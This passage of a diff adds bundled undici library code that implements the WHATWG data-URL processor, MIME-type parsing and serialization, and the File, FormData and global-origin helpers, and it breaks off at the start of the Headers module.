structuredClone, + subresource, + forbiddenMethods, + requestBodyHeader, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + redirectStatus, + corsSafeListedMethods, + nullBodyStatus, + safeMethods, + badPorts, + requestDuplex, + subresourceSet, + badPortsSet, + redirectStatusSet, + corsSafeListedMethodsSet, + safeMethodsSet, + forbiddenMethodsSet, + referrerPolicySet +} + + +/***/ }), + +/***/ 685: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { atob } = __nccwpck_require__(4300) +const { isomorphicDecode } = __nccwpck_require__(2538) + +const encoder = new TextEncoder() + +/** + * @see https://mimesniff.spec.whatwg.org/#http-token-code-point + */ +const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ +const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line +/** + * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point + */ +const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line + +// https://fetch.spec.whatwg.org/#data-url-processor +/** @param {URL} dataURL */ +function dataURLProcessor (dataURL) { + // 1. Assert: dataURL’s scheme is "data". + assert(dataURL.protocol === 'data:') + + // 2. Let input be the result of running the URL + // serializer on dataURL with exclude fragment + // set to true. + let input = URLSerializer(dataURL, true) + + // 3. Remove the leading "data:" string from input. + input = input.slice(5) + + // 4. Let position point at the start of input. + const position = { position: 0 } + + // 5. Let mimeType be the result of collecting a + // sequence of code points that are not equal + // to U+002C (,), given position. + let mimeType = collectASequenceOfCodePointsFast( + ',', + input, + position + ) + + // 6. Strip leading and trailing ASCII whitespace + // from mimeType. + // Undici implementation note: we need to store the + // length because if the mimetype has spaces removed, + // the wrong amount will be sliced from the input in + // step #9 + const mimeTypeLength = mimeType.length + mimeType = removeASCIIWhitespace(mimeType, true, true) + + // 7. If position is past the end of input, then + // return failure + if (position.position >= input.length) { + return 'failure' + } + + // 8. Advance position by 1. + position.position++ + + // 9. Let encodedBody be the remainder of input. + const encodedBody = input.slice(mimeTypeLength + 1) + + // 10. Let body be the percent-decoding of encodedBody. + let body = stringPercentDecode(encodedBody) + + // 11. If mimeType ends with U+003B (;), followed by + // zero or more U+0020 SPACE, followed by an ASCII + // case-insensitive match for "base64", then: + if (/;(\u0020){0,}base64$/i.test(mimeType)) { + // 1. Let stringBody be the isomorphic decode of body. + const stringBody = isomorphicDecode(body) + + // 2. Set body to the forgiving-base64 decode of + // stringBody. + body = forgivingBase64(stringBody) + + // 3. If body is failure, then return failure. + if (body === 'failure') { + return 'failure' + } + + // 4. Remove the last 6 code points from mimeType. + mimeType = mimeType.slice(0, -6) + + // 5. Remove trailing U+0020 SPACE code points from mimeType, + // if any. + mimeType = mimeType.replace(/(\u0020)+$/, '') + + // 6. Remove the last U+003B (;) code point from mimeType. + mimeType = mimeType.slice(0, -1) + } + + // 12. If mimeType starts with U+003B (;), then prepend + // "text/plain" to mimeType. + if (mimeType.startsWith(';')) { + mimeType = 'text/plain' + mimeType + } + + // 13. Let mimeTypeRecord be the result of parsing + // mimeType. + let mimeTypeRecord = parseMIMEType(mimeType) + + // 14. If mimeTypeRecord is failure, then set + // mimeTypeRecord to text/plain;charset=US-ASCII. + if (mimeTypeRecord === 'failure') { + mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') + } + + // 15. Return a new data: URL struct whose MIME + // type is mimeTypeRecord and body is body. + // https://fetch.spec.whatwg.org/#data-url-struct + return { mimeType: mimeTypeRecord, body } +} + +// https://url.spec.whatwg.org/#concept-url-serializer +/** + * @param {URL} url + * @param {boolean} excludeFragment + */ +function URLSerializer (url, excludeFragment = false) { + if (!excludeFragment) { + return url.href + } + + const href = url.href + const hashLength = url.hash.length + + return hashLength === 0 ? href : href.substring(0, href.length - hashLength) +} + +// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points +/** + * @param {(char: string) => boolean} condition + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePoints (condition, input, position) { + // 1. Let result be the empty string. + let result = '' + + // 2. While position doesn’t point past the end of input and the + // code point at position within input meets the condition condition: + while (position.position < input.length && condition(input[position.position])) { + // 1. Append that code point to the end of result. + result += input[position.position] + + // 2. Advance position by 1. + position.position++ + } + + // 3. Return result. + return result +} + +/** + * A faster collectASequenceOfCodePoints that only works when comparing a single character. + * @param {string} char + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePointsFast (char, input, position) { + const idx = input.indexOf(char, position.position) + const start = position.position + + if (idx === -1) { + position.position = input.length + return input.slice(start) + } + + position.position = idx + return input.slice(start, position.position) +} + +// https://url.spec.whatwg.org/#string-percent-decode +/** @param {string} input */ +function stringPercentDecode (input) { + // 1. Let bytes be the UTF-8 encoding of input. + const bytes = encoder.encode(input) + + // 2. Return the percent-decoding of bytes. + return percentDecode(bytes) +} + +// https://url.spec.whatwg.org/#percent-decode +/** @param {Uint8Array} input */ +function percentDecode (input) { + // 1. Let output be an empty byte sequence. + /** @type {number[]} */ + const output = [] + + // 2. For each byte byte in input: + for (let i = 0; i < input.length; i++) { + const byte = input[i] + + // 1. If byte is not 0x25 (%), then append byte to output. + if (byte !== 0x25) { + output.push(byte) + + // 2. Otherwise, if byte is 0x25 (%) and the next two bytes + // after byte in input are not in the ranges + // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), + // and 0x61 (a) to 0x66 (f), all inclusive, append byte + // to output. + } else if ( + byte === 0x25 && + !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) + ) { + output.push(0x25) + + // 3. Otherwise: + } else { + // 1. Let bytePoint be the two bytes after byte in input, + // decoded, and then interpreted as hexadecimal number. + const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) + const bytePoint = Number.parseInt(nextTwoBytes, 16) + + // 2. Append a byte whose value is bytePoint to output. + output.push(bytePoint) + + // 3. Skip the next two bytes in input. + i += 2 + } + } + + // 3. Return output. + return Uint8Array.from(output) +} + +// https://mimesniff.spec.whatwg.org/#parse-a-mime-type +/** @param {string} input */ +function parseMIMEType (input) { + // 1. Remove any leading and trailing HTTP whitespace + // from input. + input = removeHTTPWhitespace(input, true, true) + + // 2. Let position be a position variable for input, + // initially pointing at the start of input. + const position = { position: 0 } + + // 3. Let type be the result of collecting a sequence + // of code points that are not U+002F (/) from + // input, given position. + const type = collectASequenceOfCodePointsFast( + '/', + input, + position + ) + + // 4. If type is the empty string or does not solely + // contain HTTP token code points, then return failure. + // https://mimesniff.spec.whatwg.org/#http-token-code-point + if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { + return 'failure' + } + + // 5. If position is past the end of input, then return + // failure + if (position.position > input.length) { + return 'failure' + } + + // 6. Advance position by 1. (This skips past U+002F (/).) + position.position++ + + // 7. Let subtype be the result of collecting a sequence of + // code points that are not U+003B (;) from input, given + // position. + let subtype = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 8. Remove any trailing HTTP whitespace from subtype. + subtype = removeHTTPWhitespace(subtype, false, true) + + // 9. If subtype is the empty string or does not solely + // contain HTTP token code points, then return failure. + if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { + return 'failure' + } + + const typeLowercase = type.toLowerCase() + const subtypeLowercase = subtype.toLowerCase() + + // 10. Let mimeType be a new MIME type record whose type + // is type, in ASCII lowercase, and subtype is subtype, + // in ASCII lowercase. + // https://mimesniff.spec.whatwg.org/#mime-type + const mimeType = { + type: typeLowercase, + subtype: subtypeLowercase, + /** @type {Map} */ + parameters: new Map(), + // https://mimesniff.spec.whatwg.org/#mime-type-essence + essence: `${typeLowercase}/${subtypeLowercase}` + } + + // 11. While position is not past the end of input: + while (position.position < input.length) { + // 1. Advance position by 1. (This skips past U+003B (;).) + position.position++ + + // 2. Collect a sequence of code points that are HTTP + // whitespace from input given position. + collectASequenceOfCodePoints( + // https://fetch.spec.whatwg.org/#http-whitespace + char => HTTP_WHITESPACE_REGEX.test(char), + input, + position + ) + + // 3. Let parameterName be the result of collecting a + // sequence of code points that are not U+003B (;) + // or U+003D (=) from input, given position. + let parameterName = collectASequenceOfCodePoints( + (char) => char !== ';' && char !== '=', + input, + position + ) + + // 4. Set parameterName to parameterName, in ASCII + // lowercase. + parameterName = parameterName.toLowerCase() + + // 5. If position is not past the end of input, then: + if (position.position < input.length) { + // 1. If the code point at position within input is + // U+003B (;), then continue. + if (input[position.position] === ';') { + continue + } + + // 2. Advance position by 1. (This skips past U+003D (=).) + position.position++ + } + + // 6. If position is past the end of input, then break. + if (position.position > input.length) { + break + } + + // 7. Let parameterValue be null. + let parameterValue = null + + // 8. If the code point at position within input is + // U+0022 ("), then: + if (input[position.position] === '"') { + // 1. Set parameterValue to the result of collecting + // an HTTP quoted string from input, given position + // and the extract-value flag. + parameterValue = collectAnHTTPQuotedString(input, position, true) + + // 2. Collect a sequence of code points that are not + // U+003B (;) from input, given position. + collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 9. Otherwise: + } else { + // 1. Set parameterValue to the result of collecting + // a sequence of code points that are not U+003B (;) + // from input, given position. + parameterValue = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 2. Remove any trailing HTTP whitespace from parameterValue. + parameterValue = removeHTTPWhitespace(parameterValue, false, true) + + // 3. If parameterValue is the empty string, then continue. + if (parameterValue.length === 0) { + continue + } + } + + // 10. If all of the following are true + // - parameterName is not the empty string + // - parameterName solely contains HTTP token code points + // - parameterValue solely contains HTTP quoted-string token code points + // - mimeType’s parameters[parameterName] does not exist + // then set mimeType’s parameters[parameterName] to parameterValue. + if ( + parameterName.length !== 0 && + HTTP_TOKEN_CODEPOINTS.test(parameterName) && + (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && + !mimeType.parameters.has(parameterName) + ) { + mimeType.parameters.set(parameterName, parameterValue) + } + } + + // 12. Return mimeType. + return mimeType +} + +// https://infra.spec.whatwg.org/#forgiving-base64-decode +/** @param {string} data */ +function forgivingBase64 (data) { + // 1. Remove all ASCII whitespace from data. + data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line + + // 2. If data’s code point length divides by 4 leaving + // no remainder, then: + if (data.length % 4 === 0) { + // 1. If data ends with one or two U+003D (=) code points, + // then remove them from data. + data = data.replace(/=?=$/, '') + } + + // 3. If data’s code point length divides by 4 leaving + // a remainder of 1, then return failure. + if (data.length % 4 === 1) { + return 'failure' + } + + // 4. If data contains a code point that is not one of + // U+002B (+) + // U+002F (/) + // ASCII alphanumeric + // then return failure. + if (/[^+/0-9A-Za-z]/.test(data)) { + return 'failure' + } + + const binary = atob(data) + const bytes = new Uint8Array(binary.length) + + for (let byte = 0; byte < binary.length; byte++) { + bytes[byte] = binary.charCodeAt(byte) + } + + return bytes +} + +// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string +// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string +/** + * @param {string} input + * @param {{ position: number }} position + * @param {boolean?} extractValue + */ +function collectAnHTTPQuotedString (input, position, extractValue) { + // 1. Let positionStart be position. + const positionStart = position.position + + // 2. Let value be the empty string. + let value = '' + + // 3. Assert: the code point at position within input + // is U+0022 ("). + assert(input[position.position] === '"') + + // 4. Advance position by 1. + position.position++ + + // 5. While true: + while (true) { + // 1. Append the result of collecting a sequence of code points + // that are not U+0022 (") or U+005C (\) from input, given + // position, to value. + value += collectASequenceOfCodePoints( + (char) => char !== '"' && char !== '\\', + input, + position + ) + + // 2. If position is past the end of input, then break. + if (position.position >= input.length) { + break + } + + // 3. Let quoteOrBackslash be the code point at position within + // input. + const quoteOrBackslash = input[position.position] + + // 4. Advance position by 1. + position.position++ + + // 5. If quoteOrBackslash is U+005C (\), then: + if (quoteOrBackslash === '\\') { + // 1. If position is past the end of input, then append + // U+005C (\) to value and break. + if (position.position >= input.length) { + value += '\\' + break + } + + // 2. Append the code point at position within input to value. + value += input[position.position] + + // 3. Advance position by 1. + position.position++ + + // 6. Otherwise: + } else { + // 1. Assert: quoteOrBackslash is U+0022 ("). + assert(quoteOrBackslash === '"') + + // 2. Break. + break + } + } + + // 6. If the extract-value flag is set, then return value. + if (extractValue) { + return value + } + + // 7. Return the code points from positionStart to position, + // inclusive, within input. + return input.slice(positionStart, position.position) +} + +/** + * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type + */ +function serializeAMimeType (mimeType) { + assert(mimeType !== 'failure') + const { parameters, essence } = mimeType + + // 1. Let serialization be the concatenation of mimeType’s + // type, U+002F (/), and mimeType’s subtype. + let serialization = essence + + // 2. For each name → value of mimeType’s parameters: + for (let [name, value] of parameters.entries()) { + // 1. Append U+003B (;) to serialization. + serialization += ';' + + // 2. Append name to serialization. + serialization += name + + // 3. Append U+003D (=) to serialization. + serialization += '=' + + // 4. If value does not solely contain HTTP token code + // points or value is the empty string, then: + if (!HTTP_TOKEN_CODEPOINTS.test(value)) { + // 1. Precede each occurence of U+0022 (") or + // U+005C (\) in value with U+005C (\). + value = value.replace(/(\\|")/g, '\\$1') + + // 2. Prepend U+0022 (") to value. + value = '"' + value + + // 3. Append U+0022 (") to value. + value += '"' + } + + // 5. Append value to serialization. + serialization += value + } + + // 3. Return serialization. + return serialization +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} char + */ +function isHTTPWhiteSpace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === ' ' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} str + */ +function removeHTTPWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +/** + * @see https://infra.spec.whatwg.org/#ascii-whitespace + * @param {string} char + */ +function isASCIIWhitespace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' +} + +/** + * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace + */ +function removeASCIIWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +module.exports = { + dataURLProcessor, + URLSerializer, + collectASequenceOfCodePoints, + collectASequenceOfCodePointsFast, + stringPercentDecode, + parseMIMEType, + collectAnHTTPQuotedString, + serializeAMimeType +} + + +/***/ }), + +/***/ 8511: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { types } = __nccwpck_require__(3837) +const { kState } = __nccwpck_require__(5861) +const { isBlobLike } = __nccwpck_require__(2538) +const { webidl } = __nccwpck_require__(1744) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const encoder = new TextEncoder() + +class File extends Blob { + constructor (fileBits, fileName, options = {}) { + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) + + fileBits = webidl.converters['sequence'](fileBits) + fileName = webidl.converters.USVString(fileName) + options = webidl.converters.FilePropertyBag(options) + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + // Note: Blob handles this for us + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // 2. Convert every character in t to ASCII lowercase. + let t = options.type + let d + + // eslint-disable-next-line no-labels + substep: { + if (t) { + t = parseMIMEType(t) + + if (t === 'failure') { + t = '' + // eslint-disable-next-line no-labels + break substep + } + + t = serializeAMimeType(t).toLowerCase() + } + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + d = options.lastModified + } + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. + // F.type is set to t. + // F.lastModified is set to d. + + super(processBlobParts(fileBits, options), { type: t }) + this[kState] = { + name: n, + lastModified: d, + type: t + } + } + + get name () { + webidl.brandCheck(this, File) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, File) + + return this[kState].lastModified + } + + get type () { + webidl.brandCheck(this, File) + + return this[kState].type + } +} + +class FileLike { + constructor (blobLike, fileName, options = {}) { + // TODO: argument idl type check + + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // TODO + const t = options.type + + // 2. Convert every character in t to ASCII lowercase. + // TODO + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + const d = options.lastModified ?? Date.now() + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. + // F.type is set to t. + // F.lastModified is set to d. + + this[kState] = { + blobLike, + name: n, + type: t, + lastModified: d + } + } + + stream (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.stream(...args) + } + + arrayBuffer (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.arrayBuffer(...args) + } + + slice (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.slice(...args) + } + + text (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.text(...args) + } + + get size () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.size + } + + get type () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.type + } + + get name () { + webidl.brandCheck(this, FileLike) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, FileLike) + + return this[kState].lastModified + } + + get [Symbol.toStringTag] () { + return 'File' + } +} + +Object.defineProperties(File.prototype, { + [Symbol.toStringTag]: { + value: 'File', + configurable: true + }, + name: kEnumerableProperty, + lastModified: kEnumerableProperty +}) + +webidl.converters.Blob = webidl.interfaceConverter(Blob) + +webidl.converters.BlobPart = function (V, opts) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if ( + ArrayBuffer.isView(V) || + types.isAnyArrayBuffer(V) + ) { + return webidl.converters.BufferSource(V, opts) + } + } + + return webidl.converters.USVString(V, opts) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.BlobPart +) + +// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag +webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ + { + key: 'lastModified', + converter: webidl.converters['long long'], + get defaultValue () { + return Date.now() + } + }, + { + key: 'type', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'endings', + converter: (value) => { + value = webidl.converters.DOMString(value) + value = value.toLowerCase() + + if (value !== 'native') { + value = 'transparent' + } + + return value + }, + defaultValue: 'transparent' + } +]) + +/** + * @see https://www.w3.org/TR/FileAPI/#process-blob-parts + * @param {(NodeJS.TypedArray|Blob|string)[]} parts + * @param {{ type: string, endings: string }} options + */ +function processBlobParts (parts, options) { + // 1. Let bytes be an empty sequence of bytes. + /** @type {NodeJS.TypedArray[]} */ + const bytes = [] + + // 2. For each element in parts: + for (const element of parts) { + // 1. If element is a USVString, run the following substeps: + if (typeof element === 'string') { + // 1. Let s be element. + let s = element + + // 2. If the endings member of options is "native", set s + // to the result of converting line endings to native + // of element. + if (options.endings === 'native') { + s = convertLineEndingsNative(s) + } + + // 3. Append the result of UTF-8 encoding s to bytes. + bytes.push(encoder.encode(s)) + } else if ( + types.isAnyArrayBuffer(element) || + types.isTypedArray(element) + ) { + // 2. If element is a BufferSource, get a copy of the + // bytes held by the buffer source, and append those + // bytes to bytes. + if (!element.buffer) { // ArrayBuffer + bytes.push(new Uint8Array(element)) + } else { + bytes.push( + new Uint8Array(element.buffer, element.byteOffset, element.byteLength) + ) + } + } else if (isBlobLike(element)) { + // 3. If element is a Blob, append the bytes it represents + // to bytes. + bytes.push(element) + } + } + + // 3. Return bytes. + return bytes +} + +/** + * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native + * @param {string} s + */ +function convertLineEndingsNative (s) { + // 1. Let native line ending be be the code point U+000A LF. + let nativeLineEnding = '\n' + + // 2. If the underlying platform’s conventions are to + // represent newlines as a carriage return and line feed + // sequence, set native line ending to the code point + // U+000D CR followed by the code point U+000A LF. + if (process.platform === 'win32') { + nativeLineEnding = '\r\n' + } + + return s.replace(/\r?\n/g, nativeLineEnding) +} + +// If this function is moved to ./util.js, some tools (such as +// rollup) will warn about circular dependencies. See: +// https://github.com/nodejs/undici/issues/1629 +function isFileLike (object) { + return ( + (NativeFile && object instanceof NativeFile) || + object instanceof File || ( + object && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + object[Symbol.toStringTag] === 'File' + ) + ) +} + +module.exports = { File, FileLike, isFileLike } + + +/***/ }), + +/***/ 2015: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) +const { kState } = __nccwpck_require__(5861) +const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) +const { webidl } = __nccwpck_require__(1744) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile + +// https://xhr.spec.whatwg.org/#formdata +class FormData { + constructor (form) { + if (form !== undefined) { + throw webidl.errors.conversionFailed({ + prefix: 'FormData constructor', + argument: 'Argument 1', + types: ['undefined'] + }) + } + + this[kState] = [] + } + + append (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // 1. Let value be value if given; otherwise blobValue. + + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? webidl.converters.USVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with + // name, value, and filename if given. + const entry = makeEntry(name, value, filename) + + // 3. Append entry to this’s entry list. + this[kState].push(entry) + } + + delete (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) + + name = webidl.converters.USVString(name) + + // The delete(name) method steps are to remove all entries whose name + // is name from this’s entry list. + this[kState] = this[kState].filter(entry => entry.name !== name) + } + + get (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return null. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx === -1) { + return null + } + + // 2. Return the value of the first entry whose name is name from + // this’s entry list. + return this[kState][idx].value + } + + getAll (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return the empty list. + // 2. Return the values of all entries whose name is name, in order, + // from this’s entry list. + return this[kState] + .filter((entry) => entry.name === name) + .map((entry) => entry.value) + } + + has (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) + + name = webidl.converters.USVString(name) + + // The has(name) method steps are to return true if there is an entry + // whose name is name in this’s entry list; otherwise false. + return this[kState].findIndex((entry) => entry.name === name) !== -1 + } + + set (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // The set(name, value) and set(name, blobValue, filename) method steps + // are: + + // 1. Let value be value if given; otherwise blobValue. + + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? toUSVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with name, value, and + // filename if given. + const entry = makeEntry(name, value, filename) + + // 3. If there are entries in this’s entry list whose name is name, then + // replace the first such entry with entry and remove the others. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx !== -1) { + this[kState] = [ + ...this[kState].slice(0, idx), + entry, + ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) + ] + } else { + // 4. Otherwise, append entry to this’s entry list. + this[kState].push(entry) + } + } + + entries () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key+value' + ) + } + + keys () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key' + ) + } + + values () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'value' + ) + } + + /** + * @param {(value: string, key: string, self: FormData) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." + ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } +} + +FormData.prototype[Symbol.iterator] = FormData.prototype.entries + +Object.defineProperties(FormData.prototype, { + [Symbol.toStringTag]: { + value: 'FormData', + configurable: true + } +}) + +/** + * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry + * @param {string} name + * @param {string|Blob} value + * @param {?string} filename + * @returns + */ +function makeEntry (name, value, filename) { + // 1. Set name to the result of converting name into a scalar value string. + // "To convert a string into a scalar value string, replace any surrogates + // with U+FFFD." + // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end + name = Buffer.from(name).toString('utf8') + + // 2. If value is a string, then set value to the result of converting + // value into a scalar value string. + if (typeof value === 'string') { + value = Buffer.from(value).toString('utf8') + } else { + // 3. Otherwise: + + // 1. If value is not a File object, then set value to a new File object, + // representing the same bytes, whose name attribute value is "blob" + if (!isFileLike(value)) { + value = value instanceof Blob + ? new File([value], 'blob', { type: value.type }) + : new FileLike(value, 'blob', { type: value.type }) + } + + // 2. If filename is given, then set value to a new File object, + // representing the same bytes, whose name attribute is filename. + if (filename !== undefined) { + /** @type {FilePropertyBag} */ + const options = { + type: value.type, + lastModified: value.lastModified + } + + value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile + ? new File([value], filename, options) + : new FileLike(value, filename, options) + } + } + + // 4. Return an entry whose name is name and whose value is value. + return { name, value } +} + +module.exports = { FormData } + + +/***/ }), + +/***/ 1246: +/***/ ((module) => { + +"use strict"; + + +// In case of breaking changes, increase the version +// number to avoid conflicts. +const globalOrigin = Symbol.for('undici.globalOrigin.1') + +function getGlobalOrigin () { + return globalThis[globalOrigin] +} + +function setGlobalOrigin (newOrigin) { + if (newOrigin === undefined) { + Object.defineProperty(globalThis, globalOrigin, { + value: undefined, + writable: true, + enumerable: false, + configurable: false + }) + + return + } + + const parsedURL = new URL(newOrigin) + + if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { + throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) + } + + Object.defineProperty(globalThis, globalOrigin, { + value: parsedURL, + writable: true, + enumerable: false, + configurable: false + }) +} + +module.exports = { + getGlobalOrigin, + setGlobalOrigin +} + + +/***/ }), + +/***/ 554: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const { kGuard } = __nccwpck_require__(5861) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { + makeIterator, + isValidHeaderName, + isValidHeaderValue +} = __nccwpck_require__(2538) +const { webidl } = __nccwpck_require__(1744) +const assert = __nccwpck_require__(9491) + +const kHeadersMap = Symbol('headers map') +const kHeadersSortedMap = Symbol('headers map sorted') + +/** + * @param {number} code + */ +function isHTTPWhiteSpaceCharCode (code) { + return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize + * @param {string} potentialValue + */ +function headerValueNormalize (potentialValue) { + // To normalize a byte sequence 